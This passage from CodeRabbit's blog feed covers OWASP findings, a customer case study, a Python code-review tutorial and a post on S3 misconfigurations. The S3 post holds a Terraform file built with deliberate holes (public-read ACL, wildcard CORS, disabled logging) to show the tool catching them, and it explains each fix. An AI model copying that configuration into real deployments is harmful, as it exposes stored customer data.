SQL injection attacks, it suggests parameterizing queries instead of string formatting to prevent malicious input from being executed as part of the query. This can be done by passing the user inputs as parameters to the query, which ensures that the database treats them as values rather than executable code. Refer to the [review comment](https://github.com/coderabbitai/coderabbit-pr-review/pull/1#discussion_r1867619370) for more information. ### **Insecure Design (A04:2021)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2ef33c7d5e5ee9dafdbc066dfac4b04b11e4edd4e2a8a2dd2a334d63c5e712a2_cb89a653d7.png) CodeRabbit has flagged multiple security concerns in the current API implementation, such as hardcoded API URL, lack of CSRF protection, lack of password strength validation, and absence of rate limiting for brute-force protection. These issues violate the OWASP Insecure Design (A04:2021) risk, highlighting the importance of designing applications with built-in security features to prevent common vulnerabilities. To mitigate this risk, it recommends moving the API URL to an environment variable, implementing CSRF protection by adding a token to requests, enforcing strong password validation before submission, and applying rate limiting to defend against brute-force attacks. These improvements will help mitigate the identified risks and enhance the application's overall security. You can read the [code review comment](https://github.com/coderabbitai/coderabbit-pr-review/pull/1#discussion_r1867619393) to know more. ### **Security Misconfiguration (A05:2021)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/105333b9ee30359a927285fa6834d7144ec2db02cb9ecd89ebcbfd6e9a36bf91_96937c4cb1.png) Running Flask in debug mode exposes sensitive information, such as stack traces and detailed error messages, which attackers can exploit. CodeRabbit has identified this issue and flagged it as a security risk. This practice violates the OWASP Security Misconfiguration (A05:2021) risk, as enabling debug mode in a production environment allows attackers to gain insights into the application's inner workings, significantly increasing the chances of an attack. To resolve this, it suggests disabling debug mode in production environments. This can be achieved by using environment variables to conditionally enable debug mode only in the development environment, ensuring that sensitive information is not exposed in production. Refer to the [review comment](https://github.com/coderabbitai/coderabbit-pr-review/pull/1#discussion_r1867619351) to know more. ### Other Security Risks Detected by CodeRabbit In addition to the OWASP violations mentioned, Coderabbit has identified other critical security issues, including broken authentication, insecure data storage, unvalidated input, potential XSS vulnerabilities, and more. These flaws could compromise sensitive data and allow unauthorized access. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c42dcad7452dab8d49474db10e5b932f1a8c518d0062a7ba46b114603cf4175c_6603c8bd42.png) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/09c7c65f13537d6dc8f89e88f58e4eaddf1a60ded7342a00829bbf6936877826_9618d53fbc.png) To mitigate these risks, it’s recommended that tokens be securely stored, proper session management enforced, route protection implemented, and other security concerns addressed. This will significantly strengthen the application's overall security. Refer to the various security related [code review comments](https://github.com/coderabbitai/coderabbit-pr-review/pull/1#discussion_r1867619374) to know more. ## Summary In conclusion, addressing OWASP vulnerabilities through automated code reviews is crucial for maintaining secure and reliable applications. Automated code reviews are essential for catching vulnerabilities early in the development process. By continuously scanning for potential issues, these tools help identify security flaws, misconfigurations, and code inefficiencies before they make it to production. [CodeRabbit](https://www.coderabbit.ai/)’s ability to identify vulnerabilities and recommend best practices makes it a handy tool for developers to maintain high-security standards. By detecting critical flaws early in the development process, CodeRabbit empowers developers to create safer software while ensuring efficiency is not compromised. Its automated code review capabilities streamline the workflow, allowing teams to focus on building applications without the burden of security checks. Don't wait for a breach- [Sign up](https://app.coderabbit.ai/login?free-trial) today and safeguard your code

How Bluecopa Leveraged CodeRabbit to Reduce Bugs in Production

Sahil Mohan Bansal — Fri, 06 Dec 2024 00:00:00 GMT

Bluecopa, is a leading finance vertical platform that delivers a cloud-based application to help their customers with automating various financial planning & analytical processes, enhancing data precision which leads to more data-driven business decisions for Finance teams. Bluecopa sought to streamline its development process, improve code quality, and foster a collaborative engineering culture across its team of 25+ engineers. By leveraging CodeRabbit, Bluecopa achieved significant improvements in software release efficiency and code quality. This case study delves into the challenges faced by Bluecopa, the implementation of CodeRabbit, and the resulting benefits. ### **Business Challenges** As Bluecopa rapidly scaled its engineering team, maintaining code quality and consistency became increasingly challenging. Manual code review processes were time-consuming and often overlooked critical issues. The team sought various modern solutions to automate different aspects of their software development lifecycle, including the code review process. They were already using Github Copilot and Cursor for AI-powered code development, Claude by Anthropic for data analysis, and now they were looking to add more agility in the code review stage. > "CodeRabbit's suggestions were really precise. We are now paying a lot of attention to typos, naming conventions, and the placement of types. It's fascinating and truly a proactive painkiller." - Ravi, Head of Engineering, Bluecopa ### **Looking for an AI-powered Solution** Bluecopa’s CEO is a 3x startup founder and has emphasized using cutting-edge engineering solutions for their engineering teams. Their engineering teams use AI internally a lot to help the product development lifecycle become more agile and easier to manage. They discovered CodeRabbit when they were specifically looking for AI solutions in the code review space that could help reduce the manual effort for developers and free up their time to focus on writing code. While at the same time the code review quality needed to meet a high bar so that it could replace the human effort in the first-pass of code reviews. They looked at other products before CodeRabbit and eventually started to use CodeRabbit more frequently after being delighted with the quality of the AI-powered comments and feedback generated directly at the developer’s pull request. ### **CodeRabbit Benefits** Bluecopa implemented CodeRabbit to address these challenges. They integrated CodeRabbit’s SaaS app with their GitHub organization and CodeRabbit enabled their team to: * **Get Started in literally two minutes:** All it takes to use CodeRabbit is a simple integration with the GitHub organization and Bluecopa was up and running with AI code reviews in just two minutes. * **Fewer bugs in production:** After implementing CodeRabbit, the engineering teams at Bluecopa immediately saw fewer bugs going into production. This saves a huge amount of time for developers as they can fix any issues well before they hit their customers in production. * **User-reinforced learnings:** Bluecopa engineers found the CodeRabbit comments in their GitHub pull requests to be very meaningful. They started interacting with the bot through a chat interface within the first week and that made it easier to understand why the underlying AI was identifying potential issues such as syntax errors, style violations, and security vulnerabilities. * **Automated test cases:** Without AI, it was more likely that Bluecopa’s fast-moving engineering teams might miss out on test cases especially those that cover edge scenarios. But CodeRabbit’s AI was able to identify and recommend the test cases to include in the code which improves overall code quality * **Foster Collaboration:** Once the initial front-end engineering team at Bluecopa was happy with the AI code reviews, they expanded the use case internally by inviting more of their back-end engineering team members and added more GitHub repositories to be reviewed by CodeRabbit. This facilitated seamless collaboration among team members, enabling knowledge sharing and code quality discussions. ### **Summary** Bluecopa liked that the review comments were precise and accurate. Without AI, they may sometimes run into challenges where a human engineer doing manual code reviews may not be an expert in the programming language used to write the code. But with the power of AI all of those barriers break down and AI does the first pass of the reviews better than manual reviews. Bluecopa continues to use CodeRabbit and is looking forward to the new features coming out on the roadmap such as BitBucket integration, support for Docstrings, a code editor plugin integration, and more! **Get Started with CodeRabbit** You can utilize the power of AI Code Reviews with CodeRabbit as well. It takes less than 5 minutes, and no credit card is required, to integrate CodeRabbit with your git platform. [Start Your Free Trial](https://app.coderabbit.ai/login?free-trial), create a new pull request, and watch AI simplify your code reviews in just a few minutes. Questions? Reach out to our team for [support](https://www.coderabbit.ai/contact-us).

How to Setup Python Code Reviews With CodeRabbit

Aravind Putrevu — Wed, 04 Dec 2024 00:00:00 GMT

This is the second in a series of posts we intend to write about how to do code reviews as simply and quickly as possible. In the last [article](https://www.coderabbit.ai/blog/how-to-automate-typescript-code-reviews-with-coderabbit), we discussed how CodeRabbit helps boost productivity and spot issues in large TypeScript projects, and it’s worth revisiting. This time, we’re going a step further—We'll show you how [CodeRabbit improves Python](https://www.b-list.org/weblog/2022/may/13/boring-python-dependencies/) code quality beyond what typical linters can do. By the end, you’ll see how it makes Python code reviews smoother and more efficient. ## **The most common challenges in code review** Before we start, let’s see why “code reviews are **so time-consuming and challenging for reviewers and developers.**“ %[https://twitter.com/GergelyOrosz/status/1490042796979404815] > Code reviews can sometimes be a pain. They're more than just another routine task for developers. Reviewers often go back and forth, nitpicking over preferences instead of real issues. Conflicting opinions? That’s a whole other headache—especially when multiple reviewers disagree. And then there’s the back-and-forth because the dev didn’t get the comments or didn’t hit the expected quality bar. Add unclear expectations, and the whole process can feel like it’s dragging on forever. These fundamental issues aren’t explicitly tied to *Python* or any other programming language but are common in any code review process. Let’s see what typical code review challenges developers see when working explicitly with the Python codebase. ## Challenges in Python Code Reviews ### **Code Reviews are easy in theory, difficult in practice — especially when it comes to Python.** As we saw with the introduction, developers have different views on what the goal of a code review is. Some developers think that it’s about finding technical issues, others view it as a tool to verify the functional requirements of the code. Let’s see what specific challenges we face in a Python code review. ### **Example:** ```python # Code below demonstrates a PEP 8 violation: Improper spacing around operators and missing spaces after commas def calculateUserAge(user_birthdate, current_date): age = current_date.year - user_birthdate.year # Inconsistent spacing around the operator return age ``` ### Type safety and Dynamic typing * Difficulty in tracking type-related bugs due to Python's dynamic typing * Confusion about when to use *type* annotations **Example:** ```python # Problematic: Lack of clarity on the type of 'data' and its expected methods # The code assumes 'data' has a 'transform' method, but the type of 'data' is not specified. def process_data(data): return data.transform() # What type is 'data'? What methods should it have? ``` ### Code complexity Most of the problems in software engineering *do not* come from *unoptimized* code. Most of the problems in software engineering *come* from the mess we have in our code. %[https://twitter.com/peter_szilagyi/status/1504887154761244673] * Unnecessary complexity in implementations * Convoluted logic flows * Overuse of conditional statements * Failure to use Python's built-in features **Example** ```python # Problematic: Unnecessary complexity and deep nesting # The code uses multiple nested 'if' statements, which make the logic harder to follow. def get_user_status(user): status = None if user.is_active: if user.last_login: if (datetime.now() - user.last_login).days < 30: status = "active" else: status = "inactive" else: status = "never_logged_in" else: status = "disabled" return status ``` ### Dependencies and Import management * Circular *imports* and unclear dependency hierarchies * Mixed absolute/relative imports **Example:** ```python # Problematic: Circular import between file1.py and file2.py # file1.py imports ClassB from file2.py, and file2.py imports ClassA from file1.py. # This creates a circular dependency that can lead to ImportError or unexpected behavior. # file1.py from file2 import ClassB # Circular import class ClassA: def method(self): return ClassB() # file2.py from file1 import ClassA # Circular import class ClassB: def method(self): return ClassA() ``` ### Code modularization and architecture * Inconsistent project structure and mixing business logic with infra code * Unclear separation of concerns **Example:** ```python # Problematic: Lack of modularization and responsibility segregation # The 'create_user' method is performing multiple tasks (validation, database connection, sending emails, and logging). # This violates the Single Responsibility Principle (SRP) and can make the code harder to maintain or extend. class UserService: def create_user(self, data): # Validates data # Connects to database # Sends welcome email # Logs to monitoring system pass ``` ### Bad testing practices Test coverage — is controversial and it depends but, we don’t think 100% coverage as a *target* is a good idea, but we think you should be measuring and reporting coverage during your test runs. Instead of treating it as a target, treat it as a warning and if coverage suddenly *drops*, then it’s likely a sign something else has gone wrong in either the main codebase or the test suite and writing tests is cheaper than not writing them. * Insufficient test coverage and unclear test intentions * Long and bad test suites **Example:** ```python # Problematic: Bad testing practice - insufficient validation and lack of edge case testing # The test only checks if the user is not None, which is not a comprehensive validation of the user creation process. # The test should verify whether the user was created with correct attributes and handle edge cases such as invalid input, # missing data, or errors during creation. This test lacks assertions for data correctness and doesn't test failure cases. def test_user_creation(): user = create_user("john", "doe", 25) assert user is not None # This assertion is too basic and doesn't validate correctness ``` ### Performance Issues * Inefficient data structures usage and memory leaks * Unnecessary computations **Example** ```python # Problematic: O(n) lookup performance issue # The current implementation performs a linear search (O(n)) through the 'users' list, which can be slow for large datasets. # As the size of 'users' grows, the lookup time increases linearly, causing performance degradation. def find_user(users: list, user_id: int) -> Optional[User]: for user in users: if user.id == user_id: return user return None ``` ### Poor error handling * Inconsistent error handling patterns * Too broad exception catching * Missing error logs **Example:** ```python # Problematic: Poor error handling - catching all exceptions and logging them without context # The code catches all exceptions using a generic 'Exception' class, which can hide specific errors and make debugging difficult. # Additionally, it only logs the error message without providing useful context about where the error occurred or the state of the application. try: do_something() except Exception as e: log.error(e) # Too generic and lacks context, making debugging harder ``` # Ruff — A fast linter, but there's more to code quality No doubt [Ruff](https://github.com/astral-sh/ruff) is very fast. Using a linter like **Ruff** can significantly improve code quality, but it also comes with particular challenges, noise, and the need for manual intervention on every PR/Change. ### **Examples of Ruff's Limitations:** 1. **Docstring enforcement** - Ruff may flag missing or inconsistent docstrings, which can be annoying in smaller projects. 2. **Code complexity** - Ruff includes rules like the *mccabe* complexity check, which might flag complex code but still maintainable in context. Code refactoring based on these suggestions can sometimes be unnecessary, especially in smaller functions. 3. **Isort integration** - Ruff includes import order checks, which can get noisy, particularly if you have frequent import changes or a dynamically loaded module structure. 4. **Ruff doesn't support custom rules or plugins, which is its most significant current limitation.** Let us run CodeRabbit on a popular Python repo for developing Autonomous AI Agents! ## Running CodeRabbit on a CrewAI PR [**CrewAI**](https://www.crewai.com/) **is a Python framework for orchestrating role-playing autonomous AI agents.** Let’s do a live testing of CodeRabbit on the CrewAI repo: ![Fork of CrewAI](https://victorious-bubble-f69a016683.media.strapiapp.com/7047ff62da1d6869464c612d43962de2b6726d73a18d437fc4cc60df3e84c5e4_cc56709b05.png) * Go to the [CrewAI GitHub repository.](https://github.com/crewAIInc/crewAI) * Click the “Fork” button at the top right corner of the page to create a copy of the repo in your own GitHub account. **Clone the repo to your local machine**: * Open your terminal or Git Bash. * Run the following command to clone your fork ```bash git clone https://github.com//crewAI.git ``` **Select any existing branch**: ![Code review feedback -demo repo-crewai](https://victorious-bubble-f69a016683.media.strapiapp.com/f134c61bf566ccfe49c7936a5529ad1a51485442e5380f241d8da8332b8677fb_faa5ad004c.png) * Navigate into your project folder: ```bash cd crewAI ``` * Switch to an existing branch using: ```bash git checkout ``` * **Make a small change**: * Open the repo in your preferred code editor (e.g., VSCode). * Make a small change to any file. For example, add a comment or modify an existing one. * **Commit the changes**: ```bash git add . git commit -m "Made a small change for testing CodeRabbit" ``` * Push your branch back to your forked repo: ```bash git push origin ``` **Raise a Pull Request (PR)**: * Go to your GitHub fork and click the “Compare & pull request” button. * Review your changes and click “Create pull request.” * ![Code review feedback on PR](https://victorious-bubble-f69a016683.media.strapiapp.com/1cf788eb3eaee62fe9222de7a1180cef830c26ee255085db15c4d8192918f7e6_0b941a77bb.png) Create the pull request and see CodeRabbit in action ![Pull Request Summary by CodeRabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/b4449d843b38e2f8ba055e552f14324fbbffac6d648ba003fb4ba461c3435c8b_0bd0c5dc76.png)

💡

Yes That’s it. It’s so simple and easy to get started but after creating a PR.

## Important — Activating CodeRabbit for Your Fork ![Configure using CodeRabbit UI for each repository](https://victorious-bubble-f69a016683.media.strapiapp.com/54e816c742af0fc74f044b0afb4a6697b70ba5ccf48a533b179061c54077b4a2_01d20bffdd.png)

💡

Not seeing CodeRabbit in action on your PR? Here's a quick checklist:

1. Ensure you're logged in to CodeRabbit using your GitHub account 2. Add your forked repository to CodeRabbit dashboard at [https://app.coderabbit.ai/settings/repositories](https://app.coderabbit.ai/settings/repositories) > **Pro Tip**: CodeRabbit only reviews repositories that are explicitly added to your dashboard. If you don't see the AI reviewer on your PR, this is likely the reason. For more detailed setup instructions, visit the CodeRabbit [documentation](https://docs.coderabbit.ai/configure-coderabbit). ## Key findings in CodeRabbit review Let’s take a look at some of the results which we get after the review done by **CodeRabbit** of this [pull request](https://github.com/tyaga001/crewAI/pull/3). Here are the key findings from CodeRabbit's code review: 1. **Special Methods Enhancement:** * *\_\_getitem\_\_* method needs better error handling * TODO comment needs to be addressed before merging * Suggestion to validate key types and handle KeyError exceptions ![key findings from CodeRabbit's code review](https://victorious-bubble-f69a016683.media.strapiapp.com/78e135a2ace2a88415c0ffa13eb834ad911d914bf6d0276b34a54afae1819520_67ae3f2697.png) 1. **File Operations Issues:** * Duplicate initialization logic between methods * Potential race condition identified in append method * Need for proper error handling in file operations * Missing UTF-8 encoding specification 2. ![File Operations Issues](https://victorious-bubble-f69a016683.media.strapiapp.com/905821ca77754aa82da8beaf4724b6c64d27d8e53b735efdf719d72175aaf9fe_39f9dbcfcd.png) 3. **Test Coverage Gaps:** * Missing test coverage for *TaskOutputJsonHandler* * While *PickleHandler* is tested, JSON handler implementation needs coverage 4. **Task Creation Redundancy:** * Potential duplicate task creation in *kickoff\_for\_each\_async* * Risk of tasks being scheduled multiple times For the complete review and discussion, check out the [PR](https://github.com/tyaga001/crewAI/pull/3). The best part? CodeRabbit suggests the 1-click fixes right in the code review comment. ![For quick fixes, CodeRabbit offers one button solution to commit AI recommended changes.](https://victorious-bubble-f69a016683.media.strapiapp.com/cd123dea14b8b993e236fe9ec4cad5b0be0b0a6179015ce2103df6eca003ac05_974b72bc01.png) No more back-and-forth between developer and reviewer in PR comments. We understand that you may have experimented with various linters or other AI tools for code review, but CodeRabbit seamlessly integrates into the GitHub workflow without any additional steps. Simply create a pull request, wait approximately five minutes, and you'll receive a comprehensive analysis of code issues before any manual review takes place. If you're a developer or a founder who conducts [code reviews](https://coderabbit.ai) frequently, consider the time spent on minor issues like formatting adjustments, naming conventions, or optimizing loops. With CodeRabbit, you can shift your focus to more critical aspects, such as evaluating whether the code effectively addresses user needs or assessing its stability for production deployment. ## Transform Your Python Code Reviews from Pain Points to Productivity We've explored the common challenges in Python code reviews, from PEP8 compliance to complex architectural issues, and showed how CodeRabbit goes beyond traditional linters to provide intelligent, context-aware solutions. By automating the tedious aspects of code review, CodeRabbit helps teams focus on what truly matters - building great software. Sign up to [**CodeRabbit**](https://app.coderabbit.ai/login?free-trial) for a free trial and experience automatic reviews that enhance your application's quality while helping your team work faster and better. You can also join the [**Discord channel**](https://discord.gg/coderabbit) to connect with a community of developers, share insights, and discuss the projects you're working on. PS: It is free for Open-source projects.

How to Catch S3 Misconfigurations Early with Automated AI Code Reviews

Atulpriya Sharma — Tue, 26 Nov 2024 00:00:00 GMT

Amazon S3 (Simple Storage Service) is a widely used cloud storage solution that allows users to store and manage data, including [backups](https://docs.aws.amazon.com/aws-backup/latest/devguide/getting-started.html), [static websites](https://docs.aws.amazon.com/AmazonS3/latest/userguide/WebsiteHosting.html), and other files using buckets. While S3 offers [significant flexibility and scalability](https://www.allthingsdistributed.com/2023/07/building-and-operating-a-pretty-big-storage-system.html), it also presents challenges such as ensuring proper access controls, managing data lifecycle policies, and maintaining security against unauthorized access. Misconfigured S3 buckets can lead to significant breaches, as seen in the [FedEx incident](https://www.infosecurity-magazine.com/news/fedex-s3-bucket-exposes-private/), where an unsecured bucket exposed over 119,000 sensitive customer documents. Cloud misconfigurations are among the leading attack vectors for cybercriminals, with recent [industry reports](https://www.strongdm.com/blog/cloud-security-statistics) indicating they account for around 15% of all data breaches. These vulnerabilities often happen because cloud environments are complex, and the pressure to release software quickly can make it hard to keep security measures in check. Integrating security early in the development process is crucial to addressing this challenge. Code Review can play an essential role by ensuring best practices and security measures are in place right from the beginning. To assist with this, CodeRabbit integrates with the development pipeline and automatically reviews configuration files. It identifies potential vulnerabilities in S3 configurations, ensuring storage buckets are secure while allowing development teams to maintain efficiency. ## Common Misconfigurations in S3 Buckets S3 buckets are a powerful cloud storage solution, but improper configurations can expose sensitive data, leading to severe breaches. Developers sometimes delay changes to configurations with the mindset of "I'll fix it later," leaving vulnerabilities like misconfigured access controls unchecked. Over time, these unresolved issues can escalate their way into production environments, creating significant security risks. As seen in the [Capita incident](https://www.theregister.com/2023/05/22/capita_security_pensions_aws_bucket_city_councils/), misconfigured AWS S3 buckets exposed sensitive pension data and affected several local city councils in the UK. S3 buckets are a powerful tool for cloud storage, but minor misconfigurations can lead to potentially disastrous consequences. Some of the major misconfigurations are: * **Public Website Assets Spillage**: Teams often configure S3 buckets for hosting static assets like images and stylesheets. However, if the bucket’s public access settings are not carefully managed, sensitive resources like database backups, configuration files, or logs may be accidentally exposed to the public. Such exposure can lead to severe legal repercussions, loss of trust, and potential financial penalties due to regulatory non-compliance. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d3f020d0b7c381cf811d5e2dc3fb3538b17993373f1a9521ded16d8e8efc55a1_9cb865bbc7.png) * **Cross-Environment Access**: Development, staging, and production environments often require separate S3 buckets to manage different stages of the application lifecycle. However, issues arise when policies or permissions from the production environment are mistakenly copied to the development or staging buckets, allowing unintentional access. Additionally, wildcard IAM principals grant broad permissions, opening doors to unauthorized access that can result in data leaks or manipulations that compromise the integrity of production data and lead to significant operational disruptions. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/61f1efa10b136abc8f7e79cd98214b5908f80d25a3af9ff5bc014a6439edb50f_f21c0bb2c0.png) * **Third-Party Integrations**: Many businesses integrate S3 with external services such as Content Delivery Networks (CDNs) or analytics tools to enhance performance and functionality. If bucket policies are not carefully crafted, they may grant overly broad access to third-party services, increasing the risk of unauthorized data exposure. Additionally, failing to implement IP restrictions can further widen this vulnerability leading to exposing critical data breaches or loss. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/50cf3b164e82c080b6cb71d3cf8f53b50d1aa8f0a55e217c91efcadb637541e9_3116c31978.png) * **Logging & Auditing Issues**: Proper logging is essential for monitoring access and changes to S3 buckets. However, some teams may set up logging without adequate configurations or inadvertently create policies that lead to the automatic deletion of logs. Without proper access controls for logs, organizations may find it challenging to investigate incidents or ensure compliance with regulatory requirements. Inadequate logging can hinder incident response efforts and leave organizations vulnerable during audits or investigations into breaches. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/82383928ee0141549cf3882acce96cbcca6981056ee4dcbebd23a6ef14a9c9bb_8b1b7fcce4.png) CodeRabbit offers a proactive solution to these challenges by integrating security checks into the development lifecycle. It assists in detecting possible security vulnerabilities, like incorrectly configured S3 bucket access or overly permissive IAM policies, by automatically examining configuration files at the beginning of the CI/CD process. This approach ensures that issues like public website asset spillage, cross-environment access risks, or inaccurate logging setups are detected early, well before they reach production. ## Demonstrating CodeRabbit’s Security Detection in S3 Configurations To showcase CodeRabbit's ability to detect security vulnerabilities, we deliberately introduced typical misconfigurations in our S3 setup, including overly permissive bucket policies, lack of encryption, and incorrect lifecycle settings. With a quick two-click setup, we [integrated CodeRabbit](https://coderabbit.ai/blog/how-to-integrate-ai-code-review-into-your-devops-pipeline) into our repository, where it seamlessly identified these security risks in real-time. Upon submitting a pull request, the system automatically reviews the files and produces a detailed report with these key sections: **Summary**: A brief overview of the significant changes identified, emphasizing areas requiring attention. **Walkthrough**: A detailed, step-by-step breakdown of the reviewed files, pointing out specific issues and offering suggestions for improvement. **Table of Changes**: A table outlining all file changes along with a summary for each, helping prioritize actions. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b8d99ba53e8f5c8148eac0123c7889b9cc57d9969c2b90663ec52cb97958f25d_f2c8e3e250.png) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a7624ccf2691192c07939fceaa3eedcead43bc61f16eace48c158c12c56aec9c_2a97e5a66e.png) Here’s the sample terraform file that bootstraps a bucket with specific policies, which we will use to demonstrate CodeRabbit's capabilities in detecting S3 misconfigurations. ```javascript provider "aws" { region = "eu-north-1" } resource "aws_s3_bucket" "data_lake_bucket" { bucket = "coderabbit-s3-data-lake-demo" acl = "public-read" versioning { enabled = false } encryption { sse_algorithm = "AES256" } lifecycle { prevent_destroy = false } cors_rule { allowed_headers = ["*"] allowed_methods = ["GET", "POST", "PUT"] allowed_origins = ["*"] max_age_seconds = 3000 } logging { target_bucket = "coderabbit-s3-data-lake-demo-logs" target_prefix = "logs/" enabled = false } tags = { Environment = "Analytics" Purpose = "Data Lake Storage" } } resource "aws_s3_bucket_object" "raw_data_object" { bucket = aws_s3_bucket.data_lake_bucket.bucket key = "raw_data/customer_data.csv" source = "customer_data.csv" } resource "aws_s3_bucket_object" "processed_data_object" { bucket = aws_s3_bucket.data_lake_bucket.bucket key = "processed_data/sales_data.parquet" source = "sales_data.parquet" } resource "aws_s3_bucket_lifecycle_configuration" "data_lake_lifecycle" { bucket = aws_s3_bucket.data_lake_bucket.bucket rule { id = "Move raw data to Glacier" enabled = true prefix = "raw_data/" transition { days = 30 storage_class = "GLACIER" } expiration { days = 365 } } } resource "aws_s3_bucket_public_access_block" "data_lake_public_access_block" { bucket = aws_s3_bucket.data_lake_bucket.bucket block_public_acls = true block_public_policy = true } output "bucket_name" { value = aws_s3_bucket.data_lake_bucket.bucket } ``` The terraform file executes below operations: 1. Configures AWS provider and creates the S3 bucket. 2. Sets ACL with AES256 encryption and versioning. 3. Adds CORS rules and logging configuration. 4. Uploads raw and processed data files. 5. Defines lifecycle rules and object expiration. 6. Blocks public access and outputs the bucket name. Here is the uploadFile.js script that uploads raw and processed data files to an S3 bucket. ```javascript const AWS = require('aws-sdk'); const fs = require('fs'); const s3 = new AWS.S3({ region: 'eu-north-1', }); const bucketName = 'coderabbit-s3-data-lake-demo'; const rawDataFile = 'customer_data.csv'; const processedDataFile = 'sales_data.parquet'; async function uploadFile(fileName, key) { const fileContent = fs.readFileSync(fileName); const params = { Bucket: bucketName, Key: key, Body: fileContent, ACL: 'private', }; try { const data = await s3.upload(params).promise(); console.log(`File uploaded successfully: ${data.Location}`); } catch (err) { console.error('Error uploading file:', err); } } uploadFile(rawDataFile, 'raw_data/customer_data.csv'); uploadFile(processedDataFile, 'processed_data/sales_data.parquet'); ``` The file performs the following key operations: 1. Initializes the AWS S3 client with the region. 2. Defines the target bucket name and file paths for upload. 3. Reads file content from the local file system. 4. Constructs upload parameters including bucket, key, and access control. 5. Uploads files to the specified S3 bucket paths. 6. Logs success or error messages after each upload operation. Having walked through, let’s deep dive into each review given by Code Rabbit. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4740d0450610cc6b30bdc2d757ad5727f09b9ecd95be993eeeeb2b84008bb6d3_966153edce.png) In the uploadFile.js script, CodeRabbit has identified potential issues with the current AWS SDK configuration. The code uses the AWS SDK v2, which is nearing its end-of-life, and should be upgraded to AWS SDK v3 for better performance and modern features. Additionally, the hardcoded region could be made more flexible by using environment variables. Finally, the method for providing AWS credentials is not clearly documented, which could lead to potential misconfigurations. To improve this setup, it suggests migrating to AWS SDK v3, making the region configurable via environment variables, and explicitly documenting how to securely provide AWS credentials, either through environment variables or IAM roles when running in an AWS environment. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0982f688b84558523cc66138c7ca1c9bd703778f5d3d58a2a91ea0fde684c977_e5d14095de.png) The current implementation of file uploads in uploadFile.js lacks error handling and may result in both uploads being triggered in parallel, which can cause issues if sequential processing is needed. Additionally, without proper error handling, any failures during the upload process may go unnoticed. To address this, CodeRabbit suggests adding error handling and considering whether the uploads should be executed sequentially. This ensures that any upload failures are logged clearly, and subsequent steps are only executed if previous uploads succeed, thereby improving reliability and debugging in case of errors. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f939ec515eb806fbaf449222c86b8c2aff9982cf190da2f870625c62d841dfee_77dfd5da15.png) In the uploadFile.js script, CodeRabbit has detected that the bucket name and file paths are hardcoded, which reduces flexibility and makes it challenging to deploy in different environments (like dev, staging, or prod). Additionally, there is no validation to check if the specified files actually exist before attempting to upload them. To improve this, it suggests making the bucket name and file paths configurable using environment variables. It also recommends adding file existence validation to prevent errors during the upload process due to missing files. These enhancements will make the script more robust and adaptable to different deployment scenarios. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/068870c27e0034206582b49c046aba9608e65a263a6bb2117ea6f036ba2bfb64_cf63695eef.png) CodeRabbit has identified that the uploadFile function has performance and reliability issues. It uses synchronous file reading, lacks content-type detection, and does not validate file size. Additionally, error handling is basic and does not cover specific issues like access denials or missing buckets. To improve the function, it is suggested to use asynchronous file reading, implement content-type detection, and validate the file size before upload. Enhanced error handling is also recommended to cover specific S3 errors, ensuring more robust and efficient file uploads. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a53562302ad2d4c859d3863143a33ec0732a6511b742bcb5d5b982f507938ab7_ffc6a1b251.png) It states that the aws\_region variable uses an uncommon default region (eu-north-1), which may not be familiar to all users. Additionally, there is no validation to ensure that only valid AWS regions are provided. To improve this, it is suggested to switch to a more widely used default region like us-east-1 or eu-west-1. Additionally, a validation condition is recommended to ensure that the provided region follows the proper [AWS region naming convention](https://docs.aws.amazon.com/general/latest/gr/rande.html#s3), enhancing the robustness and clarity of the configuration. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0819651defc1d16d9e8090f832882291d3dc08f943f0ace99530760f648bae66_7651a1fc7f.png) In the configuration, CodeRabbit recognized a potential issue with the lifecycle rule settings. The default 30-day transition to Glacier is considered too short for a data lake, as objects may need to remain accessible for a longer period before transitioning. It suggests extending the transition period to 90 days and adding validation to ensure the transition period is at least 30 days. Additionally, it recommends ensuring that the expiration period is longer than the transition period to avoid premature deletion of data. These changes will help ensure that data is transitioned and expired according to reasonable retention policies. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/603ffe9f1572a14a3083529a8ebd02d5018cff912b4455d77575954ce37c875f_ebab81af8c.png) CodeRabbit has found security concerns in the current S3 bucket configuration. The public-read ACL is set, which allows public access to the bucket, potentially exposing sensitive data. Additionally, the CORS configuration is overly permissive, allowing requests from any origin and all headers, which could lead to unauthorized access. It suggests removing the public-read ACL and changing it to private to restrict access. Moreover, it recommends tightening the CORS settings by specifying allowed origins, limiting allowed methods to GET and PUT, and restricting headers to only those necessary, such as Authorization and Content-Type. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/de91b9edcda0c4c96f432e8032bb1690e3867744eb76492aeb20c7c3332d440b_95650c99ee.png) CodeRabbit has identified a potential security risk in the current S3 object configuration. The configuration does not include encryption for sensitive data objects, such as customer and sales data, which could expose them to unauthorized access. Additionally, the source files should be verified for existence before attempting to create the objects in S3. To enhance security It recommends adding [server-side encryption with AWS KMS](https://docs.aws.amazon.com/kms/latest/developerguide/overview.html) (aws:kms) to ensure that sensitive data is encrypted at rest. It also suggests using a KMS key (e.g., aws\_kms\_key.data\_lake\_key.arn) to manage the encryption. Furthermore, a check should be added to verify the existence of the source files before proceeding with the upload to S3 ![](https://victorious-bubble-f69a016683.media.strapiapp.com/873377b5166d66d9f0e1f4a7129a9574995ccc49e6f165f683fb8ac6ac6a5f43_e92b5339e0.png) CodeRabbit has detected a conflicting access configuration in the S3 bucket setup. The current public access block settings are configured to block public ACLs and public policies, but the S3 bucket still has a public-read ACL. This creates ambiguity in the bucket's security posture and can lead to unintended public access. To resolve this conflict and enhance security, it suggests removing the public-read ACL from the S3 bucket, as previously suggested. This will ensure that the access control settings are aligned and the data is properly protected from unauthorized public access. 